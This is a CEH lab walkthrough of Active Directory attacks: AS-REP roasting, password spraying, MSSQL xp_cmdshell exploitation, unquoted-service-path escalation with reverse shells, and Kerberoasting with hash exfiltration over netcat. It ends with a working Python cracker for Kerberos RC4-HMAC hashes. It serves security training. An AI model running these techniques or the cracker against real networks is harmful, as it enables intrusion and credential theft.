5. Active Directory (AD) Attacks
This module was recently added to CEH v13 Practical.
Last updated
The initial Nmap scan is the foundation of AD enumeration: it identifies live hosts, open ports, and services, which lets us locate the domain controller, map the AD environment, and plan targeted attacks against it.
Ports 88/TCP (kerberos-sec) and 389/TCP (LDAP) are open, which confirms that the domain controller (DC) is at 10.10.1.22.
We get the domain name and FQDN.
AS-REP roasting targets user accounts that have Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH flag in userAccountControl). Normally a client must prove knowledge of the password in the AS-REQ before the DC answers; for these accounts the DC replies to an unauthenticated AS-REQ, so an attacker can request an AS-REP for them without knowing the password.
The AS-REP contains the TGT (encrypted with the krbtgt key, which is useless to us) and an encrypted part carrying the session key, which is encrypted with a key derived from the user's password (the NT hash for RC4-HMAC, etype 23). That encrypted part is what gets captured and cracked offline with Hashcat or John the Ripper: each candidate password is turned into a key and used to attempt the decryption, and the guess whose checksum verifies is the user's password.
GetNPUsers.py: Impacket script that looks for accounts with pre-authentication disabled and requests an AS-REP for each of them.
CEH.com/: Target AD domain (the trailing slash separates the domain from an optional username).
-no-pass: Do not prompt for a password; the AS-REQs are sent unauthenticated, which is all that is needed for accounts that do not require pre-authentication.
-usersfile ~/ADtools/users.txt: File with one username per line to try.
-dc-ip 10.10.1.22: IP address of the DC to query.
In Kali, we can use the following command as well
The output shows that the user joshua has DONT_REQUIRE_PREAUTH set, so the script returns his AS-REP hash (the line beginning with $krb5asrep$23$). Copy that line and save it as joshuahash.txt with echo '[HASH]' > joshuahash.txt.
Now crack the hash offline against a wordlist (Hashcat mode 18200, or John's krb5asrep format).
CrackMapExec (CME) automates password spraying: one known password is tested against many accounts and services. For instance, once "cupcake" has been cracked, CME can try it against every user in our list across the whole network, revealing other accounts that reuse the same password and giving us new footholds. Before spraying, check the domain's account lockout threshold and observation window so that a single pass does not lock out the accounts you are testing.
Spray the password against the services the Nmap scan showed running on the targets.
rdp: Targets the Remote Desktop Protocol (RDP) service.
10.10.1.0/24: IP address range to target, encompassing all hosts within the subnet 10.10.1.0 with a subnet mask of 255.255.255.0.
-u /root/ADtools/users.txt: Specifies the path to the file containing user accounts for authentication.
-p "cupcake": The password recovered by AS-REP roasting, tested against the RDP service on every host in the range.
The user mark uses the same password, cupcake, on host 10.10.1.40, so we can connect to that host over RDP as mark.
PowerView is a PowerShell tool for network and AD enumeration. It gathers detailed information about user accounts, groups, computers, ACLs, and domain trusts, and is used to identify weaknesses and misconfigurations in an AD environment. It is commonly employed in penetration testing and red team operations and runs on Windows from a PowerShell session.
Launch PowerShell from the Windows search box and dot-source the script with . .\PowerView.ps1 so that its functions are loaded into the current session. (The script must already be downloaded to the machine.)
PowerView is flagged by Windows Defender, so antivirus protection on the host must be disabled or bypassed before the script will load.
Execute Get-NetComputer in PowerShell. It lists all computer objects in AD (hostnames, operating systems, and related attributes), which helps in identifying network targets and mapping the AD environment.
Execute Get-NetGroup in PowerShell. The Get-NetGroup command in PowerView lists all groups in AD, which helps in identifying group memberships and potential targets for privilege escalation.
Execute command Get-NetUser in PowerShell. Get-NetUser in PowerView retrieves detailed information about AD user accounts, such as usernames and group memberships. It helps identify potential targets and understand the AD environment better.
We find a user SQL_srv with elevated privileges, a promising target for further attacks.
Other PowerView commands useful for enumeration:
Get-NetOU - Lists all organizational units (OUs) in the domain.
Get-NetSession - Lists active SMB sessions on a specified host.
Get-NetLoggedon - Lists users currently logged on to machines.
Get-NetProcess - Lists processes running on domain machines.
Get-NetService - Lists services on domain machines.
Get-NetDomainTrust - Lists domain trust relationships.
Get-ObjectACL - Retrieves ACLs for a specified object.
Find-InterestingDomainAcl - Finds interesting ACLs in the domain.
Get-NetSPN - Lists service principal names (SPNs) in the domain.
Invoke-ShareFinder - Finds shared folders in the domain.
Invoke-UserHunter - Finds where domain admins are logged in.
Invoke-CheckLocalAdminAccess - Checks if the current user has local admin access on specified machines.
xp_cmdshell is a SQL Server extended stored procedure that runs operating-system commands from within T-SQL. If it is enabled and reachable by an account an attacker controls, it gives arbitrary command execution on the database host, which can lead to data exfiltration and wider network compromise. It should stay disabled (the default) unless there is a specific need, and then be restricted to the fewest possible logins.
MSSQL listens on port 1433; we will first brute-force the password of the SQL_srv account.
Save the username SQL_srv in a text file and name it as user.txt using command pluma user.txt.
Now brute-force the MSSQL password for that user.
We have successfully cracked the password for SQL_srv, which is "batman". Next, we will attempt to log into the service using mssqlclient.py.
Now, execute the following command.
Since xp_cmdshell is enabled on the SQL Server instance, we can use Metasploit to turn that into code execution on the host.
Once the exploitation is complete, we will be getting a Meterpreter session. You can move to shell by typing shell.
WinPEASx64.exe is a tool for Windows privilege escalation, identifying misconfigurations and vulnerabilities for potential exploitation.
An unquoted service path vulnerability arises when the command stored for a service (its ImagePath) or for an autorun entry such as a Run/RunOnce registry key contains spaces but is not wrapped in quotes. Windows then treats the string up to each space as a possible executable and runs the first one that exists, so an attacker who can write to one of those locations (for example C:\Program Files\CEH.exe for a path under C:\Program Files\CEH Services) gets their binary executed with the privileges of whatever runs the entry, at service start or at logon.
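The following is an added example, not code from the page or from winPEAS, showing the mechanics behind this check: given a command string as stored in the registry, it lists the paths Windows would try before the intended executable, produces the quoted form that closes the hole, and audits a small set of entries. The entries are constructed; only the first mirrors the walkthrough's CEH Services finding, the others are hypothetical. Whether a candidate location is actually writable is a separate check (winPEAS performs it) that this example does not do.

```python
"""Unquoted-path analysis for Windows service ImagePath and autorun command values."""

# Constructed sample entries (not output from the lab's winPEAS run): (name, command as stored in the
# registry). Only the first mirrors the walkthrough's "CEH Services" finding; the rest are hypothetical.
SAMPLE_ENTRIES = [
    ("CEHService", r"C:\Program Files\CEH Services\file.exe"),
    ("Quoted", r'"C:\Program Files\CEH Services\file.exe" -service'),
    ("NoSpaces", r"C:\Windows\System32\svchost.exe -k netsvcs"),
    ("WithArgs", r"C:\Program Files\Vendor App\agent.exe --config C:\Program Files\Vendor App\agent.cfg"),
]


def _exe_end(tokens):
    """Index of the token that ends the intended executable: the first one with an .exe extension,
    or the last token if none has one. Everything after it is arguments."""
    return next((i for i, tok in enumerate(tokens) if tok.lower().endswith(".exe")), len(tokens) - 1)


def executable_prefixes(command: str) -> list:
    """Return every path Windows tries before the intended binary when the command is unquoted.

    CreateProcess without lpApplicationName treats the string up to each space as a candidate
    executable (appending .exe if that candidate has no extension) and runs the first one that
    exists. A quoted command, or a path without spaces, leaves no such ambiguity.
    """
    cmd = command.strip()
    if cmd.startswith('"') or " " not in cmd:
        return []
    tokens = cmd.split(" ")
    candidates = []
    for i in range(_exe_end(tokens)):
        prefix = " ".join(tokens[: i + 1])
        if "." not in prefix.rsplit("\\", 1)[-1]:  # final path component has no extension
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def quoted_command(command: str) -> str:
    """Hardened form: wrap the executable path in quotes and leave the arguments as they are."""
    cmd = command.strip()
    if not executable_prefixes(cmd):
        return cmd  # already quoted or no spaces in the path: nothing to fix
    tokens = cmd.split(" ")
    end = _exe_end(tokens)
    exe, args = " ".join(tokens[: end + 1]), " ".join(tokens[end + 1 :])
    return f'"{exe}"' + (f" {args}" if args else "")


def audit(entries) -> dict:
    """Map each hijackable entry name to the paths an attacker would plant a binary at."""
    findings = {}
    for name, cmd in entries:
        candidates = executable_prefixes(cmd)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    commands = dict(SAMPLE_ENTRIES)
    for name, candidates in audit(SAMPLE_ENTRIES).items():
        print(f"{name}: unquoted path with spaces; hijack candidates: {candidates}")
        print(f"  fix -> {quoted_command(commands[name])}")
```

For the walkthrough's path the two candidates are C:\Program.exe and C:\Program Files\CEH.exe; dropping a payload at either requires write access to C:\ or C:\Program Files respectively, which is why the writability of those directories decides whether the finding is exploitable.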
It is assumed that you still have the shell from last task.
Move to C:\Users\Public\Downloads using cd and execute the command powershell.
Now, we need to host winPEASx64.exe on the attacker machine using Python. Open a new terminal, type sudo su, press Enter, and use toor as password. Execute the command cd /root/ADtools.
Type python3 -m http.server and press Enter; this serves the current directory (including winPEASx64.exe) over HTTP on port 8000.
Get back to the shell terminal and type
Once winpeas.exe is downloaded, execute it with ./winpeas.exe
Once the execution is completed, observe the output. winPEAS reports that file.exe in C:\Program Files\CEH Services is started from an unquoted path containing spaces, which can be exploited for privilege escalation.
Open a new root terminal (sudo su, password toor) and create the payload.
Go to another terminal and type nc -nvlp 8888 and press Enter
Get back to our shell terminal and move to C:\Program Files\CEH Services. Execute the command
Execute the command.
Switch to the Windows Server 2019 (AD) machine, which now plays the victim. Reboot it with the Reset/Reboot button on the toolbar above the virtual machine (under Power and Display) and log in as SQL_srv with the password batman. The planted payload runs and we receive a shell on our Parrot OS listener.
Rubeus is a C# toolkit for interacting with and abusing Kerberos on Windows. Kerberoasting targets accounts that have a service principal name (SPN) registered: any authenticated domain user can request a service ticket (TGS) for such an SPN, and the ticket is encrypted with the service account's long-term key, which is derived from its password. The encrypted ticket is extracted and cracked offline to recover that password. The attack exploits weak service-account passwords (especially where RC4-HMAC, etype 23, is still allowed) and the fact that requesting service tickets is normal Kerberos behaviour, so it blends in with legitimate traffic.
We assume we already have a shell on a domain-joined Windows system, which gives us access to the AD environment.
In the netcat shell, run powershell to launch PowerShell, then move to C:\Users\Public\Downloads with cd ../.. ; cd Users\Public\Downloads.
Now, we will be downloading Rubeus and netcat. Execute the command
Type cd ../.. && cd Users\Public\Downloads and press Enter to move into the Downloads folder
Execute the command
After kerberoasting, the TGS-REP hash for the DC-Admin service account is saved in the file hash.txt.
To get that hash file on the attacker machine, we will be using netcat. Open a new terminal, type sudo su and press Enter; use toor as password. Then execute the command
In the shell terminal, execute the command.
Get back to the netcat listener terminal and press Enter to save the file.
Now, we will be using HashCat to crack the password hash
-m 13100: Hash type. 13100 is Kerberos 5, etype 23 (RC4-HMAC), TGS-REP, the $krb5tgs$23$ format that Rubeus kerberoast produces. (Tickets encrypted with AES, etype 17 or 18, would need modes 19600 or 19700 instead.)
--force: This option forces Hashcat to ignore warnings and run even if there are compatibility issues. Use this with caution, as it might cause instability or incorrect results.
-a 0: This specifies the attack mode. 0 stands for a straight attack, which is a simple dictionary attack where Hashcat tries each password in the dictionary as it is.
hash.txt: is the input file containing the hashes to crack
/root/ADtools/rockyou.txt: is the wordlist file used for the attack
After completion we get the password advanced!. Since DC-Admin has high privileges on the domain, this password can be used for further attacks.
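Both cracking steps on this page, the AS-REP hash from the joshua section (Hashcat -m 18200) and the Kerberoast hash above (-m 13100), use the same RC4-HMAC (etype 23) routine; the only difference is the Kerberos message type mixed into the key (8 for the AS-REP encrypted part, 2 for a ticket). The following added example, not code from the page or from Impacket, Rubeus or Hashcat, implements that routine in pure Python so the "offline cracking" step is concrete: NT hash of each candidate, the K1/K3 derivation from RFC 4757, RC4 decryption, and the HMAC-MD5 checksum test that tells a right guess from a wrong one. The two hash lines are constructed here with known passwords (cupcake and advanced!, matching the walkthrough) so the small wordlist recovers them; the SPN, the confounder and the plaintexts are assumptions, not lab data.

```python
"""Offline cracking of RC4-HMAC (etype 23) Kerberos blobs: AS-REP (hashcat -m 18200) and TGS-REP (hashcat -m 13100)."""
import hashlib, hmac, struct

MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable on OpenSSL 3 builds."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a = rol((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rol((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rol((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    """RC4-HMAC long-term key = NT hash = MD4(UTF-16LE(password)); unsalted, so one guess is tested once per user."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def rc4_hmac_encrypt(key: bytes, msg_type: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757: K1 = HMAC(K, T); checksum = HMAC(K1, data); K3 = HMAC(K1, checksum); out = checksum || RC4(K3, data)."""
    k1 = hmac_md5(key, struct.pack("<I", msg_type))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)
    return checksum + rc4(hmac_md5(k1, checksum), data)

def rc4_hmac_decrypt(key: bytes, msg_type: int, blob: bytes):
    """Return the plaintext when the checksum verifies under this key, else None (wrong password)."""
    k1 = hmac_md5(key, struct.pack("<I", msg_type))
    checksum, ciphertext = blob[:16], blob[16:]
    data = rc4(hmac_md5(k1, checksum), ciphertext)
    return data[8:] if hmac.compare_digest(hmac_md5(k1, data), checksum) else None

def parse_hash(line: str):
    """Split a hashcat-format line into (label, msg_type, blob); T=8 is the AS-REP enc-part, T=2 the TGS ticket."""
    if line.startswith("$krb5asrep$23$"):
        label, rest = line[len("$krb5asrep$23$"):].split(":", 1)
        checksum, edata = rest.split("$")
        return label, 8, bytes.fromhex(checksum + edata)
    if line.startswith("$krb5tgs$23$*"):
        label, rest = line[len("$krb5tgs$23$*"):].split("*", 1)
        _, checksum, edata = rest.split("$")
        return label, 2, bytes.fromhex(checksum + edata)
    raise ValueError("unsupported hash format")

def crack(line: str, wordlist):
    """Straight dictionary attack (hashcat -a 0): derive the key from each candidate and test the checksum."""
    _, msg_type, blob = parse_hash(line)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), msg_type, blob) is not None:
            return candidate
    return None

def _hashcat_fields(blob: bytes) -> str:
    return f"{blob[:16].hex()}${blob[16:].hex()}"  # 16-byte checksum, then the ciphertext

# Constructed samples, not lab captures: the confounder is fixed (random in real Kerberos) and the
# SPN is hypothetical. Passwords match the walkthrough so the wordlist below recovers them.
CONFOUNDER = bytes(range(8))
ASREP_LINE = "$krb5asrep$23$joshua@CEH.COM:" + _hashcat_fields(
    rc4_hmac_encrypt(nt_hash("cupcake"), 8, b"fake EncASRepPart", CONFOUNDER))
TGS_LINE = "$krb5tgs$23$*DC-Admin$CEH.COM$MSSQLSvc/sql.ceh.com:1433*$" + _hashcat_fields(
    rc4_hmac_encrypt(nt_hash("advanced!"), 2, b"fake EncTicketPart", CONFOUNDER))
WORDLIST = ["password", "Summer2024", "cupcake", "advanced!"]

if __name__ == "__main__":
    print("AS-REP ->", crack(ASREP_LINE, WORDLIST), "| TGS-REP ->", crack(TGS_LINE, WORDLIST))
```

Two things the code makes visible that the flags alone do not: the key is the unsalted NT hash, so every candidate costs one MD4 plus two HMAC-MD5 operations and an RC4 pass, which is why RC4-era tickets fall so quickly to GPU cracking; and the checksum is what confirms a hit, so a wrong password never yields a false positive. AES tickets (etype 17/18, Hashcat modes 19600/19700 for TGS-REP) use a PBKDF2-derived key and a different encryption profile, and are deliberately out of scope here.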